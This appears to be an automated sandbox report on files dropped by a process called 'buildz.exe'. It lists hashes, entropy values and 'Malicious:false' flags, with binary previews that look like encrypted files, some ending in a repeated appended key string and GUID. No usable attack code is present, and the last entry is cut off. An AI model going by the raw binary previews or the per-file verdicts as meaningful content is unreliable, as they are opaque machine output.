Pw........Y.;!r(%hRyA.-..`..P...$Fq..I$..z.....ta.......e7..=._[.G..b)wA.!.G..7..F.../z1f.....T.j.4....G..q.W..]..}zjx..3....]......x.....ZI.=|..|.Md....%SQ,..;....../.ETQ#j.l..3...2\..Qv..X.s.</.....NXL.b...b.D.C>...`.x...g..j....Z6..K.+K.Q.2...........(..5(..<.R.'q....aI\....<.#.*...MZ
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8140
                        Entropy (8bit):7.9779548908747815
                        Encrypted:false
                        SSDEEP:192:4stYcSquID1P/E/ZUqxZKMkY3ZUHf+WEzcA:4sdnFCZUaxB3ZUHWWOcA
                        MD5:9EB4E1CB1E72097A3F81A55EF999C0CC
                        SHA1:F5B6A5CF5CCC24E9FB58E2D5CBE76D3A3E026FD4
                        SHA-256:D80D2949EADCE218D4F7A7F523C7369C26612A7A5E6C541AB068A37445FDD072
                        SHA-512:6AB8E2067C8595D325905FA174A053C43445C750EE9BEDB72E04F8F3A3C7FBD8C5E7B02A7AA70D340C76EB151527D7536242CE3BAE41852DFDB86BB416AE36A5
                        Malicious:false
                        Preview:<?xml..rc...f&l...*..U.h.I...H.. Tz=D........fL**.~-........Q...$...;q.....:.&..M.-J.z..T.f%....g%.}W6...0Sb.}.l..n3.....7 ..y...s...\X..E..U<....[\..p....[...;9_.......R;.l.B#.. .....S.g+.....G........>...F}.&.3...kc..Y.>G....".$at...oHd...Y.0Z...q.....o@-@xF.A~n........n...04.....)....3....C/....H..C.....>b..p..t{.H..E.W....)=...... ...F....H.z.r7g.fQK.~.F3|.......d..uW&..(*...z.N7.....B....$(...1..........X.HE.^...R.j.....t...:r.@......c....[.+.ow,((C9.m.I.^7.Ue.+..N*u..{...E.P..@........Y....B.....8.].....3.i..D(w.f.z..mg..,k...4}..9..(....jI$.4...".to*.U.y..YFbS.TR(.._....R.8.Q...|..E.$E......e...E.#.S.(.p....k...'....O.i..;~(ha...CD.T....a.&.*.}#(,B@.&o|.^1.9..{-..V...f...(_.x..S.nuM..S.8.$.bq.q....k..G..[h.h...B..m.3K...e......}$..{3..&...+J..b..H.k..y+.c|...)2.e>...HM.y....>.(1...."...e.>..q.G.b.}..S.d.V...Y.d.x...].f..I...S....x...L]..r..]..O[ U.Bs....#K.)...\r..m.|..{V.}@..f...'...)......j_.J3..G.....}.A...L..nd.g$..C...T.2.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3313
                        Entropy (8bit):7.944503789157546
                        Encrypted:false
                        SSDEEP:96:lfXnIB9Ahtr89ryhw1Zvz9jViAmSNnRDqfA:lfxw9+e1Zvzy4DqfA
                        MD5:8AF429FFA0A2DDD8CD4A07C970DEB26D
                        SHA1:014E1D3D6C8B52053BE72F8670730D341BD9470A
                        SHA-256:6CF2C43BBCE698CB773D91280B7C051FC7F11F7A05F5C06FA2A935B2AEE176FD
                        SHA-512:5B1A963BEB5C017E8AE3F4B5A67669E4A971CD4125B218D2703808BBE1BCF4039A98E055E4F6DC1F4D6FD8B13633480A191CE2F7ED208AFED851CF3DAD3F37D2
                        Malicious:false
                        Preview:<?xml@..Z......{....a....w;.Z'....J..n......f...NZ^......I..=..QP..&...X...`..]...P.F.&&....}.n9.....6Z....O...U.<d.;q6..(....c...F.&uc.`C%...$..ZW..@...!Md.BZ..........A<..u.,.~.9Q......(.^..\.....=A....y..H....tU.w,a..B...h.(-U%..l........._fh%..W.j.....w.aY".F......(v.`..G...=..:..w3.-..(k.x..Yk..).mY..+..]g.P.b...f..s...x.p....V.\K.r~...i.[y.@j.......x..).&.2.r.[.._L..v......B.7O_.S.fd)..4..i..._......A>z,.p:.bJ....{#.O....'.18mi.;..I#.x...5.b...u0P0h..c.X.V.M.:i\d.),v.X....2..E.....+..".R.......U..B..f.P`0.....4.............|..f_..~+.#...M.......5G.&g..%]....N..]...l5Y..Q...<.(8...S.\.......;..n.V.?..P../}g.y,,...D.~.....zr.F.....&...G...(.6.?>C+IOcI7.|....~F}.'..D..U..........|.b.@.....@.+.8`..)+.J...Q....j8J>..f..72....{..?.....]|.C=.1...8.....l.O..x......................2..v...B..\.?.}..:.=uY.N.>........D"a1-,*..WZc.....zpf.....*.Mm;0...qh..#...j...u_..u.G......."#2p`.<.a..)...+...;`.5'.....\.vg......z.A.V._......x.00G{`......]..u*Z-....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3675
                        Entropy (8bit):7.9502190705586955
                        Encrypted:false
                        SSDEEP:96:qYPkFSyvZ1uofQo0wXplLgVKoE+yiUO9kwf7r3fA:qYPcSyvZ1ZQJ2LgQoEFiU2l7rfA
                        MD5:8E9EBFAC924C97369BDC6A1C42247E68
                        SHA1:08853833CE1D03D9ED4396D0929CADA52DF32BC1
                        SHA-256:96793F6C89B31C320853F6BA64FB7B95CC8B842F5FDCAE0EF2C0AC7F50599872
                        SHA-512:5D7C52563BE4FA1047D2F4FD2A98B28946CA1967B27E68DCA716B0E89FE908F74D03CD9158628C24B7B411BA298A4A10FA6D661EB1307AF4BCA53D75C151B782
                        Malicious:false
                        Preview:<?xml...V...7.b....lU.g.M.Q....A@...aY....&p.?...*_R......m|U..I.pP.3\.e,....8lg"K.....s.u!....@....k1....~..PD......P.....z{+.....q.e.q....Z..1.!.......~7..+|^..&.I.E.AY......t/...Be......t_.S...I...%...B\'.&!C..9.r.........K.Hl.r.8.c..Y......=...U.....Q....q...6z}.s...M..l.9...]\Ri..7c..o..]..V>....m.....L....EBiK'.....F...j.....^..../...A.....m.#`..~....XR.M...Q.+...e...Lg.q..Z.."&!EI(.5..K.9T...0b...9.." w).@.p7^.R.._9.__.<.J..~.....[.f..V..F.q.".lK#.h.%...[)NT.K..&..r.[.9..,l....0..F..c...z.!..u.&.~w..e..t:.w.ow...C-S*...E5....h.e..4....^.S....3...05*0.....=4.R..}...0....}..L.0.7..mx.....C.Jl...X->peN.v....j.2..J~3U....=.N..D.Q-..".f....j...a.......Co.._.sO..!..D.7.{........u..=..*#Oi.....$B&w.#...g...bA......wB._&..P...U.R..(9.|..0...:..I.g.:.#m3~..cC./......2L]../...B.&....S.U!.ik...KO....... .A... ...>.}.......2...*.=1....S..U.f...H.W..U..r.E.!.m...u+/.-....Ad..._@F.t.{x..F^...dD.1.TJ8.LsX.i%s....U.....8.3w.t..aq.jZ.Q..".<Q.....7J..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2924
                        Entropy (8bit):7.932607611180699
                        Encrypted:false
                        SSDEEP:48:1Es3xJ5+cvwYmsn0gU4aeCM/2dcgAQGhzhYB1YyGaeDgE99XMtY2rKw4ix1/UXMA:1Es3XIcwYmA0gDbd+dcOGhNYBeyXM2rw
                        MD5:BCEBAE3352CECFCB0F68F1FA17FC08FF
                        SHA1:88488C1DDBB79F2DE9284293F02EA885BD2A8301
                        SHA-256:69323F9BAD0BCF7F89C027B06527D3E84C9D3C169BA9543E5E3BBD14617995AC
                        SHA-512:EA229F3A092C00824B02135B133B297027B45A790C846638CAC38093DC69F8622196D0371D689CF10ABFC3434AFB5F78158647C0E2197E9A4C418B8D722CF754
                        Malicious:false
                        Preview:<?xml...D..zL!.m......o>...ST0..e......y..I.....{..V.K.v.V.....M.?....c...5....E......#f.Bo..?.Y.]9<....V..!J...p..5.0.&g...6..K.I.......3..o.G...r.s.b.Q!.L?y.......]...1..f...*x..V.*.VhT...0N..&<.0.V;..AE..G.y.....pK.....L..@.gG(..'...9.eZ.N.....T..n....6.f..[..56.N.......1M.....C.LU......s..\..6.mG.td.E.)2........1.[......A.r.?.lR.]...=....!q...Z.TUY...>.D!..o..!.i$Ok..m1..\...9isZ.2..L......Ej......zy.....4...$..^.p..*uLIk.*..^.>w.H..4...;f...u5.......,.F. .O.....|4....s.......v\.6......p....qp.?..Z...zB...Asdl.E.k..~.@..hu.F.un...+.....p..."M@...xA..B<.aa....=..ap..~k.o.e.......t...r1....!.%......h....%W.V...uM.....L?... ...gX6../<..@....0.}k....4]....d......lU...3.x9?.v...-.^.:z.<}..^.Q.......1 ...a.....L....%..E._}{;Z.......<.......2.. 4...9.`...V..jA.._.g..z.....0.....w..O.......<....j.uy..o.q.._pfR.2n..UV...;j.&U)..T...1t6kW.Gk..b.....C.??.....b2}....!...Gk1h."...G%!.eZ.)..I5.Y0c.!'.^.n....94.E.[.2...0.........nVv.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2461
                        Entropy (8bit):7.922697853559427
                        Encrypted:false
                        SSDEEP:48:MpQuWeXN56COPyVFiTmLJ9xoVX9AD1yfbQGabqCG3QfHnSu5HcMUD:IQiQZmL7+VywDVabqCGcHSCHcMA
                        MD5:2331FD7371528B9618DF471D8F8479D7
                        SHA1:0490E262CDA6A476D5C35A16404318CB970C8AFE
                        SHA-256:5EB4C18DE63D48E9757710953E3F8B36DD95C7DC1A700BA060C90238FE1262D8
                        SHA-512:3B41BCDBCE1A5FFEC0AD2392B2C8A09E98E06E6E06A154E0468D17C3BBB0385E0E8B8337759F069EC3CB6033E15F60F8D1422E93B198A7832630C1C437E5577C
                        Malicious:false
                        Preview:<?xml..."@qx.......Ci.>...7.&.w".(..J.P.R..HRv.?.^...lL...D,.<....'..v.0..I......E..}6...q.&.....5...a...aZ.g..O..x.v[;rq...U.r.:.?....*....Z.........f,.Ws.jb0D2.........%skD].(7.h.m.m..|.......Q...r....!B?....<._...+.eRo..X..M...=.&7p}.V....I.|.D.O....Nk...........yW..........p..e:.....E...+0...l......J4d......Nz.1.....d.|1.dB..>.....^..[H!.?I..pN#.4...Y}...'.8\.&...P..1.e.....N..i......G..g.NE..5.|...t.-.1...8Q.7.xt.d'.....8........+....&.R.$N....X..H.Q..\[.....P...nY-........Z..X.O.n.q.%.>o._.|+.Y@....S.K........$>....H..9....D.?...2........7y.Cr...c.x.k=.~........>.../.7....n...0'.LF..PzMD..J.v;.<@.............Q2>."S....dAlv.r.Q..$*c4f.L.u..`..8.c<^..e0.B.F.......9$.@^|`Hy.2}...Z.....,.......E.....Dd..PT. ...=t..8.7~Ush.....a..S.......Y....n........}.q..IK.Q......D.J....6.N..w......LO...(.3&I:.Ws....-.[.+......A.....&.......X...5..5.{r..%..Ux?.lfo....o+.E?.ZY........S....'..&ih.v.....F.O9.A......z...E...]..,.U.}..@.F..;.[..I.t.%
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):758
                        Entropy (8bit):7.740920859727581
                        Encrypted:false
                        SSDEEP:12:GUwnlcORlPtxjLv261ewP81r79I3g+u7X7kCodRu+7JncTLLmZbAA56HUHIa4weB:vwl/R1t9Lhev1r79I3g+8wCodY+7JcTh
                        MD5:21A8C613EEEC7AB5591E50439451E12D
                        SHA1:2CCCA081371D5E9FD67AEE94E11D3DB4F355BACC
                        SHA-256:C11B014B592FDF996373B785F81A61A7848C8DCD254D57C48191AD698BF3D844
                        SHA-512:99FE7339C4B63F8D289A5767449A81B0137F6743A56425A1846698808D3CFC993354791A69D5604A736A439E2A2B8111015966C144FDDE4D71EB3E73BCED9063
                        Malicious:false
                        Preview:<?xml..M....]....`..U..Y4(...N.....c.o....s...K.=.{...p.%=B.0:.25."..F^S.(..c3.....%.M....c.1@..*..h[..W.t Ab..F...\...Y.Q.0..<.t.......9.|.....?9A.gh...$......+i_..)...@"....;..5.p..n-....|e.F..Hd........iE.)..\....s..:.)..r..H%|..=.u&....Se."T!Y.0......{..<.~h.XX.F.c.......=.L.t3.....z!..q"l..c0W...u.T.0..S..Z...>.8..o...6!p9.U:....a..R(......Z.....^jg>..+q..\O_....^.W~g.....dB..3..G.v.Gt.y....`h.W....v......v.....Av5A...(C......8.u..".kz..b^.C..L:M.E.Jr....b.dSr......(.....e.E..>.z.=\5.)}.....GnWFD.....`....42d`%..^E.K..m.....*.7.O....u..A...dp.-C..rt}.&O.....gE0./.j...R.em0'Tdw.Cs.b......Q...:....T.0...._. ...<'od<...#.......;].n.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1210
                        Entropy (8bit):7.843358630895016
                        Encrypted:false
                        SSDEEP:24:T1TRE7aoBp96uqLpnjV/2UwFauYZw3Y63X8mvfGbD:TKaoV6bxVuUwcuYSo6n3vfUD
                        MD5:97C32940D731FE3638C8787CA77FDBEE
                        SHA1:29B89322F6CF56BACB8DA017FAE21857DDBA1069
                        SHA-256:999695F6ACDFC007966C5F0C3A3A434C75CB2AD0E8F8C1B04BFF1C4AA1EBE70C
                        SHA-512:ACB84B3DB0E404C4FA588792A255302452C223E62B35AD9643AFCFAA74033555516164D9281CB69C80F3D12183D5AF77A5260CA4DFA032D6BFDCD669E038593E
                        Malicious:false
                        Preview:<?xml.rQ.R._. ....S*.l..x............y%9!,*p+ d..kn...v..J.4jK<.._b.A.BDwD....n...hTc.......m6B|V.F(...>.......yQ.-X.Q.J..VZ..s.a..o.Z...,M`...Q..^......wb.%..E7..d..F..%.Ez.$..........3%..^{.......M{..G.4...m..^p...."./.6:.Mp..&.j.. .....79.~H@..........0-~..J..^.a&.C. ..B.y...C..q.vY(l#/...y*.2..4(T!..r..m..[.J...8S{HZ..y..F.u..8...}.rP...)..)W.__.4}....:..F^.'a36........%|Z..Q...SG)....]..2.).....x..}z.m..Oa.;..C..).....b.G..Qf.Bz%....#e....I.F!..../.^..Z.B....h..7E..i.7.l...}%..~..#.....nFp....&...#...~..t.Y3GPK..O..L .v....h....y'Xr/tj]..blB.c.-Y-.{.ZF.+u.x.!..Y.|.R.S....W....T..o..... ...)TI.......)@.W$%....w..;^.....3a.....N.C.(.2X..(.CSo....V. .....e..y....b.w.8.D.).......pi.m....(y.5"......".U.y.;....EH.....;..;...S...o....Z'.V.J..O.....p.%6R:.....F...L.E.......B....d...`.`...N....+...DE..D`R.....h...0.+..]..l..b........1...Ou.....'.8,=..D..C...&.w3zL.?3..%1(#..@]g....-P.g.O.W........=?}.Z..~.....K.Q.0..7....0.H..F..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):537
                        Entropy (8bit):7.596105594785827
                        Encrypted:false
                        SSDEEP:12:U0102pqJ/ozqdzWnvyKrRJHgnkybLd7THgFt4nyNrEX26Gcii9a:TgJA+BEJ3ybLhorEvGbD
                        MD5:ABB861BE6BA2BC9695514DDDCA49AE30
                        SHA1:9CBE3124C716320E937DA50583A2CE2DAB5FA485
                        SHA-256:0D7295137B42B6C18068FFE74D195A361F25F0C9E1C1D49E726716210DDEB8B9
                        SHA-512:406D0616DC8E58D2D73CDEA40101C9BEE608D5950DCB9791A5820BCFD80C9C6E60BDFAF73DA85088AB09CFECC8DDB180659FA0DA2AF38ACAEA02D762177B5086
                        Malicious:false
                        Preview:<?xml).L....]..U.7.H.@_..-[..}C..t..$.T?[.!.-..A.w..V....5.IO].+..T#.l.\.f6..2..*...sh.y..uh.&:.:..v.M..{.i.|.x=+..<............7...n../.. n.....E.47Y...Z<.vj..!s.D.;...UQ?.$C..F.....b...C@f...).........*...a...|.U..3.h.Qq!.3.*E.l../..G5 ...(..... ..G...i..`:.T..YFS.^.<.G....s.,.N.......@...6..,..p......G..u\*.2,.k'J\/....T.....5.....T..T..`V"A.NJ...N..k....~......P.O...M.;DH.1.M.O..._.. ...K...7...'5.j.7S.....)Xq.."}....t..nNr...../..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2493
                        Entropy (8bit):7.922128344586071
                        Encrypted:false
                        SSDEEP:48:WzUpkiX6Pp/9XLMjX3UVXgahnzndpjk1/txFbUUD:Wwpkisp9iXkVnzndpjY/tx1UA
                        MD5:8C99C25B27AA73878387312C1FF3EC17
                        SHA1:43597C97A0A2C3B9F5582A62055C0BAAC8787866
                        SHA-256:AF93C88AE53A773D4DEB779D85BE0EB3F9CCA15DF0F947240FD18B8F9D9D9749
                        SHA-512:479EAB29E2BF09FB166D6BB8377FC831EE57486E39B9D38AE482B3D3675FB5DC6AB0CCE17966F659C9DA2C56E7B25A5B1FF06E6C503645D2B6F4D71197E09B88
                        Malicious:false
                        Preview:<?xml.Sg...Y..EX(.......@..#E..T.h.T40no..2..h....W.._.kRaP......w..J..J.....1.5.h.Dux..)...c..bU.g.f..:.8`.u6....=....r..k..`..!..i-./R....PvcH.Lt;.u+.e9_.F%.;a:$"..<..CI...E....m".P.....mi3..(S.(...3^....X:g.}..1.p1o......6...KQ>..^...j]........'-4u...b..}7.w.S..q.[...!..yp....CvG].dc.y.jo.Z-.z.D...hn@8o=.~{#....6.i.v.a..bQ.U]=.4....{.X.`....8&.V.G..C....*y.bz..s.....+[..Z..zt..l.A.0U........... ..J{t...........Ke&d%.c.pe.K..nd.....Y.'.t..fv..x.-.r.rBl|.~D...(.......(^R)8sF....$s..GEe,3.wH.W..o.....h.".*LhA........:.\c...nj....@.phq.H.|>`..@.Q.....iNha..DU...?...0f}.2..s\....Py...#Qa....R.6....!..w..'y.x.P....?.X...9-..._%...x...+..\..w.R..l.Q..D..........*q....|...l.W..Ue..(..~.....~......e..%....RL.w..)E2G........Aq...|.o..W../...bc..@....0.......n.m.}.[c.ni..'.T....ECV.]..#.VNF....y...h.,J C.....#..G!.Z.'.5\t...a.;....L.1....-....F....a7...../.?.T.....K....=["...J?..%..t.J.........<...}...OW...........O.....R}?M7.${.....S......5.E.p..M.b<
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):741
                        Entropy (8bit):7.667706081069169
                        Encrypted:false
                        SSDEEP:12:9Xc7JckQDfLf3axwYGWuYmJZd1xULN4pO0VBwjrxsgtTpefNGnKoR7LKcwGI26GX:94N+DmGWuY8Tza4XwjrxsgtTpQsnKk7N
                        MD5:DAA291791D3CC7FEF558AB9D20B6D9E4
                        SHA1:0D7AE23C480558E138C784098C1B57E60EFA0675
                        SHA-256:2E768DFE8EEE46B5A5D650F3FFA0702A79F7B8C0396E8D691BE64D1151A3E999
                        SHA-512:BED487978E1A938FC373675CA64C9651E6150D4238EB0786AA48F7CC5F43EB8D7CF00A9FB36BE6B529301BAD740BF1507052A7D0D78C5A2AC68DE6A80E9172CF
                        Malicious:false
                        Preview:<?xml...-..6H........c..m.u.._X.jk...`..-.V...aD.)V0.~p.`..../jW..g.R...../o..........!.A....L.#..`1.s..3.............%.X[...>3o..gs}.}......?.....d.{..~or.Q..v.7.}..s.t=%u.nD.L.<..o.....O,.F.[.>....9.-]T".:]\..8..V.M.n3.....F.g..my...Xv_.....<em.^....y.M.....AZ.5...4..G[......2.]qh.k..m".....C-3.B.<....@.e.%.4..90'@.pf.O..$)Dqh..7.....u.&HH.`2 .w...-.....A4jL.........p......t.!.....h'....7...aO.f.'Q,E...$Zz.!*....K:..:..q...B.G.OO\].A.s.&........u......./.2......;3......s.L.+..+.<.M,...ZwJ.C..@.q4.~Xi......QUG.g.|.=...`..c.L.q..S....L..u.C..b.1k....}..l.Q.......t.M.I.&.....1q.zO.*...q4...-.;.W..|....JM.CS..#c...0..Du."EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):807
                        Entropy (8bit):7.7123949770279685
                        Encrypted:false
                        SSDEEP:12:FurlOHfXL7B+ALGmubaFBRv969AnLOe9i6DRWvap7n8g7Elz26Gcii9a:ch4DlXnv9VX9cva6l7GbD
                        MD5:14CE6C08DAD09DF874B31A0527067E93
                        SHA1:4196E3E270E16261478BC2DEDD158688FF5D8D62
                        SHA-256:9B9D215012F5ED49B328B637B6E55285AD4C2363721DB80E2A0022000F5287AE
                        SHA-512:B94ED1E8DFB99FBEC04E8DB912F22E9445E55F2A0494ECBE7927DC6B6A565A4CDCA98D41F566DF7E0977A4089FD65C1455164B9E5A4A040C8ADE11A65F4F16A7
                        Malicious:false
                        Preview:<?xmlkp.;g.Vv....k..0E.z...\.w&......!.]..%.so../......4^B.M[..4 .....%..6$.Q.v...O.`.....Z..s....m.'..#..:.2..t;P.....u..E9.M,k...+.]/...;..TF....)...l...R.N....)|N.....|.?.3.\,..FY..!.B%..&.-.....f..C.U..K.r.......i...31.._......S...v.1...V.W.S...I.C.u\|_...rYK..m./y,N.4. .B.`A...>.(.....<.;...z.'.m=1B~,...M.....y..9E..L?.P...b.vd...=J...p.9.![.....{y.]+x.C`.=PV..J.....`...)...q.<<I...?.G....N.K.._l.B(.t.o.eE....z..At.....+....T<.|...|.s..Z4.N..%..h:N.D.'2t6.f(.."M...qr..5.@gq...WH.V9X7:.+/....>.@.#l..dF.P..~...].N...PW.-.N..}..m.fLoJ_..8?../.....9..:_;.i...p6...R,..Cn....".]<..`l.?..r3.Y.8.y.1.m.......{'.x}K...p}....!S.. ...S......8.....V......n_.....J........DQ...A.u..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.708247127983828
                        Encrypted:false
                        SSDEEP:12:Mruwwd6zGCDKd5PgC5OstMXYKHoAQVe8eBwP/BfMBrF26Gcii9a:UJwdOGCDKbIsJgeAQVfK6/BfM5RGbD
                        MD5:C5B1FB43DDBCFA24C84765D3A7504F06
                        SHA1:CC7CA3308628F0B9CFA85B3D6C1EC224850BD338
                        SHA-256:C6FBE42D6BF524585E5EC2C2AD09533FEE5AD82BAEC3B7FD2D60287ABF062A0B
                        SHA-512:4D2EFD1BC6E997D81260CD4C49390057EE31E95697F33E1446D86B40B660A18E1221A25AEBCE9A2757F7C5E8EC4249A9C040EA2A274792471817C6C6EF9CEAF4
                        Malicious:false
                        Preview:<?xml1 ^i....wM....%..?.e...{WD..jH.<..a..x.......+..P...2,.m.fM\?.;S..h..d..6.An0......:.3.....w.La.#Y..^.S........9....V...k..l.Q.G...*n.BM&.F4f...s..Z....4..k......_..@..%'.Cn.......g....h..`(.sc.]tU.8...8."q.vg.J........hb:?{..gO~.Rbg.QbK|.D!*...9 ..7....Y.....b.<..-t...6.........}\..[..*=....u.....o"g...-^b*..ie....e..b...A.V....&g..1w;_>.6C73..-..,..r.r......,..E..../16... .k%.....Ie..I...as`..... ...B=.B.....Y....6E.6.m.X..J.e..T."....\1.'Yx....p....)..rz.o..{....y.....ml..b...<.-.3z..E=H...9..E..)....%\+Uk.j .G...m2.......r..is.a..^hO.6w...,..:(H.6....D.q..7./......v.3.;.......Q.e...g.!#.5^..E+= .yaF.TY@..5.T.P.7OS3.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):804
                        Entropy (8bit):7.641049984557171
                        Encrypted:false
                        SSDEEP:24:Qcl/Ss2+zuzFee7MS/A/9TQhuo0mWtRGbD:Qcl/S3+wNQq90TUD
                        MD5:5821C673B27DC86FDA9AECC5B9B51999
                        SHA1:2FBA3EF8A8189B2BB0F32CD70C0C3394AF1620EE
                        SHA-256:1E76B0E0474594DDF7913A24C6E9471003AF4FDCC92A51259B9BA42382E2AC74
                        SHA-512:0D564A196DBBE0413FFC7C32B3D633A7533639E48C60E69C4A5B965632ACE8109D7511096269B0CDB8D4E5F69233655CB67D2966E0035B996674948710B714AE
                        Malicious:false
                        Preview:<?xml-wT.Z9`.....&......@C0...*M..{LJ=.WP-...H.v.:.p1....3.|.=_w...e.P.....|....t.p{...|..,.5"?.V.c....^.B....Q.../........D0.B..lT.L..K[EHB.....k....~9H..2..vg...N:....>.......o...*$.'E.E.R=[z.<.d..9.a=/.....d.....W.0.^1,q..s.Q8......Na.:&.D.Y|.5........$b..EEU.@qK...l...8.``._.k...2=...Wm..........""n1.H;.Z...Z.].f.o&.A.#..W......QB....3i& .V.O.{......Bj.T....*m.1"E../h.IA.}..Lw....]...)....U.c.Zo.8..?Vs.....:.i...>[Y@...$\{B....-%./.A..JX.Z.o<.mz...?.....H..^b.l.V.B.Y]j.0.Q...Z...!..,...!..z*.zer.PV..9d;~..c.l.........!@%.{..g,....C#\.....y6..x(A-.D1..$d9`:#.CtH{...kTr.....R.x=5.v.9.X\.#o...I.6..=km.p.NT...Ls.....P.\.KU...OL.0...4".R.. .J{.n.\.1t......k...M.tU....6....,jH..r...;w..m.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):965
                        Entropy (8bit):7.7489731880618535
                        Encrypted:false
                        SSDEEP:12:QRxc7fdnNrye3mrU6zkLFG+/UrUfTKQB8pLHeY5bEnDzTNVV40ceZERflMc9F+5C:BpNrZxp/jRA3aNVmBRfl5+5AqWaGbD
                        MD5:54E52A22E835696259F1781261B29251
                        SHA1:5B9FE2BF54BF44702664DBEBF80270B35F646F0F
                        SHA-256:2D44A8ABE8B1E63295D3C3AFCC1F8513D18CEC9861D01A363B87BFE7D1C4E54E
                        SHA-512:A80A6BA58B72C5A844ED71CE51E728A456E973625AC90EAD15698F1877B94A818E9096DED611555577F162A2339C37370779CDBC38D12949E8713E26BDB778F4
                        Malicious:false
                        Preview:<?xml...5VKY..i..9px..Zb.....@k....L..4k*...}..qs..V:.~.Z..SC.*..k....K..i.j...T......ND..eV...m...vI.l...V..[.*.....o.GZg_...7.v..v.9...6..<.3cO..c...8Mk.$..(.K.0.9.G.gNj.<...8eQs.u(...:....2...N.mGB..V...%.w.cs..!;..G..'...._.x2..{{.../|%8-._v...}.Y..=^.....I..ye....A..7..E..B.>...kP..-].P.......!.c'..7X..a(....C...$\'........*z...Pt.6....ef.58.e.f"L.}d..T...q.o.6Il.....]..=*.%G.P.p.....g.Ez}...r..*...m...|..t..!...B..]X..-.M.x...........B.&b4.........y.NG#.].c*..`..a...a..e..kaVO'..!.'...o......A...,..Q....^XO...V.!.0..N. z.E0Le.C..9.$t.7...uB....t...3d......J....#LQ...La.s\.n..`&..6..'.....yxF.|n.}.J,....n..].B...i..i.....{......KK..L;.........."..Hadwlc..H5..@.....E....K"?..)...-.D9......... s.'.tb....B/."...G.C...T...*~.. Cdu.ju.f{A}..o.(.!.e..:WZ./..i...;.m[.'..<..^........._.........uu....0.AY,...H....9.E.pZ..O4:e_...{..g.*.iEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):800
                        Entropy (8bit):7.731998352563796
                        Encrypted:false
                        SSDEEP:24:BnHchM1ZarFgOnWDUBwLWPPGAFWYJYn0su8GbD:6hphgMPGJY6zUD
                        MD5:4ACBA3611228DBB7DF0D59C9D4C8D0FB
                        SHA1:97F2B7F882936331F45F8DBE30FD961DE3BB54F2
                        SHA-256:0530FBA6A41BD789A6CB24D94EDDDD9D6DF1EAD7D6D4D5FE6E89DD0EE50E1027
                        SHA-512:FB591980A78C78E4766F5EFA8FA8887F1766CC2244743A5F53FE031E8342EC56B530C5FA5778E4D5A7F3BC81F5D502DE7E883324EE72762AA4154853769CB152
                        Malicious:false
                        Preview:<?xml.E...?s..wx..N.(C.x ..l.......`5.K*?./. 7.,...V.j..>..=.....R..^]...v..g^.{..o.#w.X.?...L......i.......I.f...'.Y..0#bP.G.Q..).f.._I.%+.........H..bVl._....K.._$F..,......)7.%.2. -..M=.W./K&"..%.`...d4....+RQ.z...Y.{.ic..S..W......9.,/-f.v..f........y......l.;.....N.G`.!..5C.A..2..)z6}.....ePr*.I-RL.A\..=vy....X..".#.K.1c..^.*...$..(..F...P.._...jO...W..50.c{....s..n....%7..$3.Y.9....3.(P. .Hx3.. ..c=.....|.I.d.^e.]v....>....X.&.jI7.A...Wx]k.. .}...Q...2&...w......*...#.M`....:.y...k...'.7...^.wIH.OcY.>j$L.Q...o.'.\Dr.....Z..c......r.a.e.5ti..>YrB..Y.......l.Z...&....%...:..Df..q..hE..]...0W...d.P...........+..-.../.p..%....4}eJ_'$...&;....Tof......8s"....6..?..$&&..e..O...!....[EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):740
                        Entropy (8bit):7.683686046058949
                        Encrypted:false
                        SSDEEP:12:Cv+VzopHs1zU/yjRAS17p+moFP+8ZNPJvDNyZ36KHRRvi+H26Gcii9a:Cv+17zUYRA6YFPjPJrNyZjV5/GbD
                        MD5:54C2FAA463A21341068C4B94BBBDA8FB
                        SHA1:B6B36FFA1A9B2F69E3A48ED6CC13BB155E23F9A2
                        SHA-256:2CD5861F8D52B4C56E3B380FC565A5B0A08C7FA1CDEB61F9FE691F8A87CC8256
